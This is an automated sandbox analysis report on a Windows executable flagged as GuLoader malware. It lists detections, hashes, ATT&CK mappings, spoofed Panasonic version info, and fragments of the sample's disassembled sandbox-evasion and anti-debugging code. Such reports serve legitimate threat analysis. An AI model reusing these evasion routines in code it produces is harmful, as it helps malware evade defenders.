Play interactive tour

Edit tour

Analysis Report Aflytter2.exe

Overview

General Information

Sample Name:	Aflytter2.exe
Analysis ID:	379126
MD5:	327bdd165c67a077606d414d038ecda9
SHA1:	b9b3803795af6f6c3c7e8a6c06a23652bb07769f
SHA256:	be630a75cb81b3ed6624660e3c909867771e810e0733faa6dc8a571defa590d3
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Found potential dummy code loops (likely to delay analysis)

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Detected potential crypto function

PE file contains an invalid checksum

Program does not show much activity (idle)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

Aflytter2.exe (PID: 7120 cmdline: 'C:\Users\user\Desktop\Aflytter2.exe' MD5: 327BDD165C67A077606D414D038ECDA9)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: Aflytter2.exe PID: 7120	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: Aflytter2.exe PID: 7120	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: Aflytter2.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: Aflytter2.exe

ReversingLabs: Detection: 25%

Machine Learning detection for sample

Show sources

Source: Aflytter2.exe

Joe Sandbox ML: detected

Source: Aflytter2.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: Aflytter2.exe, 00000000.00000002.1172614302.000000000073A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\Aflytter2.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_00408F84		0_2_00408F84
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_00408FEF		0_2_00408FEF

Source: Aflytter2.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal88.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\Aflytter2.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD7FD3B0C05107E2A.TMP

Jump to behavior

Source: Aflytter2.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Aflytter2.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\Aflytter2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Aflytter2.exe

ReversingLabs: Detection: 25%

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: Aflytter2.exe PID: 7120, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: Aflytter2.exe PID: 7120, type: MEMORY

Source: Aflytter2.exe

Static PE information: real checksum: 0x25dde should be: 0x25236

Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004080B4 pushfd ; retf	0_2_004080B5
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_00404594 push ebx; ret	0_2_00404595
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F1006 push esp; iretd	0_2_004F55B9
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F103E push esp; iretd	0_2_004F55B9
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F10D8 push esp; iretd	0_2_004F55B9
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F54EC push esp; iretd	0_2_004F55B9
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F54EA push esp; iretd	0_2_004F55B9
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F1165 push esp; iretd	0_2_004F55B9
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F090B push esp; iretd	0_2_004F55B9
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F111F push esp; iretd	0_2_004F55B9
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0FCD push esp; iretd	0_2_004F55B9
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0FC5 push esp; iretd	0_2_004F55B9

Source: C:\Users\user\Desktop\Aflytter2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aflytter2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aflytter2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F090B	0_2_004F090B
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F092C	0_2_004F092C
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F09C6	0_2_004F09C6
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0983	0_2_004F0983
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0A06	0_2_004F0A06
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0A04	0_2_004F0A04
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0A36	0_2_004F0A36
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0A31	0_2_004F0A31
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0AC6	0_2_004F0AC6
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0A82	0_2_004F0A82
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0B4D	0_2_004F0B4D
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F0B23	0_2_004F0B23

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Aflytter2.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Aflytter2.exe	RDTSC instruction interceptor: First address: 000000000040931D second address: 000000000040931D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 29h 0x00000005 cmp eax, 000000B6h 0x0000000a cmp eax, 000000EEh 0x0000000f cmp ebx, 000000FDh 0x00000015 cmp ebx, 000000B4h 0x0000001b cmp eax, 00000092h 0x00000020 fprem 0x00000022 fxch st(0), st(1) 0x00000024 psubd xmm5, xmm1 0x00000028 fmulp st(1), st(0) 0x0000002a fldlg2 0x0000002c fsub st(0), st(0) 0x0000002e jmp 00007F576C967319h 0x00000030 cmp eax, 2Ch 0x00000033 cmp eax, 1Ah 0x00000036 cmp eax, 000000ACh 0x0000003b cmp edi, 02EAFF40h 0x00000041 movd mm1, ebx 0x00000044 movd mm1, ebx 0x00000047 movd mm1, ebx 0x0000004a movd mm1, ebx 0x0000004d psrlw mm7, DAh 0x00000051 lfence 0x00000054 emms 0x00000056 fst st(5) 0x00000058 fyl2x 0x0000005a fmulp st(0), st(0) 0x0000005c wait 0x0000005d fninit 0x0000005f jmp 00007F576C967318h 0x00000061 jne 00007F576C967127h 0x00000067 inc edi 0x00000068 cmp ebx, 70h 0x0000006b cmp eax, 25h 0x0000006e cmp ebx, 000000BFh 0x00000074 cmp ebx, 000000CEh 0x0000007a cmp ebx, 07h 0x0000007d cmp eax, 000000DDh 0x00000082 punpckhwd mm3, mm4 0x00000085 fsincos 0x00000087 pcmpgtd xmm0, xmm2 0x0000008b fscale 0x0000008d punpckhbw mm3, mm4 0x00000090 psubusb xmm7, xmm2 0x00000094 psrad mm6, mm2 0x00000097 jmp 00007F576C967318h 0x00000099 cmp eax, 27h 0x0000009c rdtsc
Source: C:\Users\user\Desktop\Aflytter2.exe	RDTSC instruction interceptor: First address: 00000000004F0508 second address: 00000000004F5E9B instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 jmp 00007F576C956E2Ah 0x00000005 cmp dh, ah 0x00000007 push 7F21185Bh 0x0000000c jmp 00007F576C956E2Ah 0x0000000e cmp dh, dh 0x00000010 push 3E17ADE6h 0x00000015 jmp 00007F576C956E2Ah 0x00000017 cmp edx, eax 0x00000019 push F21FD920h 0x0000001e test ebx, ecx 0x00000020 push 27AA3188h 0x00000025 test bx, cx 0x00000028 test eax, ebx 0x0000002a push DFCB8F12h 0x0000002f jmp 00007F576C956E2Ah 0x00000031 test bx, dx 0x00000034 cmp edx, ecx 0x00000036 test ax, cx 0x00000039 push 2D9CC76Ch 0x0000003e call 00007F576C95C6D7h 0x00000043 cmp ah, FFFFFFE7h 0x00000046 test edx, edx 0x00000048 cmp dh, ch 0x0000004a cmp bh, 00000014h 0x0000004d jmp 00007F576C956E2Ah 0x0000004f cmp dh, 0000003Ch 0x00000052 test cx, ax 0x00000055 pushad 0x00000056 lfence 0x00000059 rdtsc
Source: C:\Users\user\Desktop\Aflytter2.exe	RDTSC instruction interceptor: First address: 00000000004F5EE8 second address: 00000000004F5F39 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esp, 00000100h 0x00000011 mov edi, esp 0x00000013 cmp ah, FFFFFFE8h 0x00000016 add esp, 00000100h 0x0000001c test edx, edx 0x0000001e mov dword ptr [edi+28h], eax 0x00000021 cmp dh, ch 0x00000023 mov esi, 0000F000h 0x00000028 jmp 00007F576C9672DAh 0x0000002a test ax, cx 0x0000002d test ebx, 05E8210Ch 0x00000033 test bl, cl 0x00000035 pushad 0x00000036 lfence 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Aflytter2.exe	RDTSC instruction interceptor: First address: 00000000004F5F39 second address: 00000000004F5F90 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp ah, FFFFFF85h 0x0000000e add esi, 00001000h 0x00000014 test edx, edx 0x00000016 cmp esi, 0000F000h 0x0000001c je 00007F576C9570C7h 0x00000022 cmp dh, ch 0x00000024 cmp bh, FFFFFFF6h 0x00000027 jmp 00007F576C956E2Ah 0x00000029 cmp dh, FFFFFFCCh 0x0000002c cmp esi, 7FFFF000h 0x00000032 je 00007F576C957099h 0x00000038 test cx, ax 0x0000003b pushad 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\Aflytter2.exe	RDTSC instruction interceptor: First address: 00000000004F5F90 second address: 00000000004F5FD5 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push 00000000h 0x0000000d cmp ah, FFFFFFDCh 0x00000010 test edx, edx 0x00000012 push 0000001Ch 0x00000014 cmp dh, ch 0x00000016 push edi 0x00000017 cmp bh, FFFFFFA3h 0x0000001a cmp al, al 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f push FFFFFFFFh 0x00000021 jmp 00007F576C9672DAh 0x00000023 cmp edi, 25C79B16h 0x00000029 pushad 0x0000002a lfence 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Aflytter2.exe	RDTSC instruction interceptor: First address: 00000000004F33A5 second address: 00000000004F33A5 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F576C956E34h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp ecx, ecx 0x0000001f pop ecx 0x00000020 add edi, edx 0x00000022 jmp 00007F576C956E2Ah 0x00000024 cmp bh, FFFFFFDCh 0x00000027 dec ecx 0x00000028 cmp ecx, 00000000h 0x0000002b jne 00007F576C956DDDh 0x0000002d test cx, 237Ch 0x00000032 test dl, dl 0x00000034 push ecx 0x00000035 call 00007F576C956E4Bh 0x0000003a call 00007F576C956E44h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc

Source: C:\Users\user\Desktop\Aflytter2.exe

Code function: 0_2_00408F84 rdtsc

0_2_00408F84

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: Aflytter2.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\Aflytter2.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\Aflytter2.exe

Code function: 0_2_00408F84 rdtsc

0_2_00408F84

Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F54C2 mov eax, dword ptr fs:[00000030h]	0_2_004F54C2
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F5D5D mov eax, dword ptr fs:[00000030h]	0_2_004F5D5D
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F31F8 mov eax, dword ptr fs:[00000030h]	0_2_004F31F8
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F664B mov eax, dword ptr fs:[00000030h]	0_2_004F664B
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F660D mov eax, dword ptr fs:[00000030h]	0_2_004F660D
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F6632 mov eax, dword ptr fs:[00000030h]	0_2_004F6632
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F22EC mov eax, dword ptr fs:[00000030h]	0_2_004F22EC
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F22E6 mov eax, dword ptr fs:[00000030h]	0_2_004F22E6
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F2285 mov eax, dword ptr fs:[00000030h]	0_2_004F2285
Source: C:\Users\user\Desktop\Aflytter2.exe	Code function: 0_2_004F231F mov eax, dword ptr fs:[00000030h]	0_2_004F231F

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: Aflytter2.exe, 00000000.00000002.1172746595.0000000000CC0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: Aflytter2.exe, 00000000.00000002.1172746595.0000000000CC0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Aflytter2.exe, 00000000.00000002.1172746595.0000000000CC0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Aflytter2.exe, 00000000.00000002.1172746595.0000000000CC0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Aflytter2.exe

Code function: 0_2_004F0FC5 cpuid

0_2_004F0FC5

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	Input Capture1	Security Software Discovery411	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery211	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
Aflytter2.exe	25%	ReversingLabs	Win32.Trojan.Generic
Aflytter2.exe	100%	Avira	HEUR/AGEN.1138570
Aflytter2.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.Aflytter2.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138570		Download File
0.2.Aflytter2.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138570		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	379126
Start date:	31.03.2021
Start time:	15:37:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Aflytter2.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 26.8% (good quality ratio 8.6%) Quality average: 22% Quality standard deviation: 34.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe VT rate limit hit for: /opt/package/joesandbox/database/analysis/379126/sample/Aflytter2.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.3468334683107805
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Aflytter2.exe
File size:	90112
MD5:	327bdd165c67a077606d414d038ecda9
SHA1:	b9b3803795af6f6c3c7e8a6c06a23652bb07769f
SHA256:	be630a75cb81b3ed6624660e3c909867771e810e0733faa6dc8a571defa590d3
SHA512:	3887b2868dbb76b01452a384a498ea62366c0f11c217e90387886ef7d382e9c2d9e18b1a74134cae4dd48f561d0c7d9d55d90d3b89600908af273799bd545625
SSDEEP:	768:TZIEf4SA56SWwOmHH9ah33VHY4badYE7qpS16MNxz2K3byT/MK9vY:Nrk5iw/q3DbaDAmR0x
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L......U................. ...0...............0....@................

File Icon


Icon Hash:	f1f8f6f0f0e4f831

Static PE Info

General
Entrypoint:	0x4016fc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x55FBF294 [Fri Sep 18 11:16:36 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c78f78af0a4b82efe93f926bf0040578

Entrypoint Preview

Instruction
push 0040CA94h
call 00007F576CD7B515h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi-517312F2h], al
jecxz 00007F576CD7B53Ah
inc ebx
call far 2F93h : 9F4A41A5h
jl 00007F576CD7B522h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+7Ah], ah
cli
add ah, byte ptr [ebx+75h]
jnc 00007F576CD7B592h
imul esp, dword ptr [ecx+74h], 00006465h
and byte ptr [eax], cl
inc ecx
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
or cl, ah
adc ah, dh
mov al, 99h
clc
adc al, byte ptr [ebp-54h]
leave
ret
jnbe 00007F576CD7B4F7h
cmpsb
add dword ptr [edi+edi*8-53h], eax
jnc 00007F576CD7B4B2h
out dx, al
pop esp
cmp cl, byte ptr [ebp-44h]
cmp al, byte ptr [edx+0134BD60h]
dec edi
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov dl, 00h
add byte ptr [edi+000000B0h], dh
adc dword ptr [eax], eax
push ebx
je 00007F576CD7B58Ch
jc 00007F576CD7B591h
jnc 00007F576CD7B58Eh
jne 00007F576CD7B586h
outsb
jnc 00007F576CD7B559h
add byte ptr [00000001h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x11af4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x1412	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1ac	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11108	0x12000	False	0.4189453125	data	5.91686923553	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x13000	0xa64	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x1412	0x2000	False	0.290649414062	data	3.29230979719	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x14d4a	0x6c8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x143c2	0x988	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0x143a0	0x22	data
RT_VERSION	0x14120	0x280	data	Guarani	Paraguay

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaDateVar, _CIlog, __vbaFileOpen, __vbaNew2, __vbaInStr, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaUI1Str, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0474 0x04b0
InternalName	Aflytter2
FileVersion	3.03
CompanyName	Panasonic
Comments	Panasonic
ProductName	Panasonic
ProductVersion	3.03
FileDescription	Panasonic
OriginalFilename	Aflytter2.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Guarani	Paraguay

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: Aflytter2.exe PID: 7120 Parent PID: 6048

General

Start time:	15:38:02
Start date:	31/03/2021
Path:	C:\Users\user\Desktop\Aflytter2.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Aflytter2.exe'
Imagebase:	0x400000
File size:	90112 bytes
MD5 hash:	327BDD165C67A077606D414D038ECDA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Aflytter2.exe PID: 7120 Parent PID: 6048 Aflytter2.exeCOMMON

Executed Functions

Function 00408F84, Relevance: .9, Instructions: 890COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf524e8afc9a289c8acba6730b2f8cd3a5b570098862319fdb2ec0c101e1a68
Instruction ID: 9e2aaf2a419f318ec2c98fc18c11f97d629c843c81c13ef08079e3b7c0598471
Opcode Fuzzy Hash: 1bf524e8afc9a289c8acba6730b2f8cd3a5b570098862319fdb2ec0c101e1a68
Instruction Fuzzy Hash: 2A52CF2191E3818EEF735664C4E0B0C3AA0DF17645F344EEBC890EB4E2E62E95C99753

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA99, Relevance: 414.6, APIs: 198, Strings: 38, Instructions: 1642
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040EA99(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a20) {
				void* _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v60;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				char _v88;
				void* _v92;
				char _v96;
				signed int _v100;
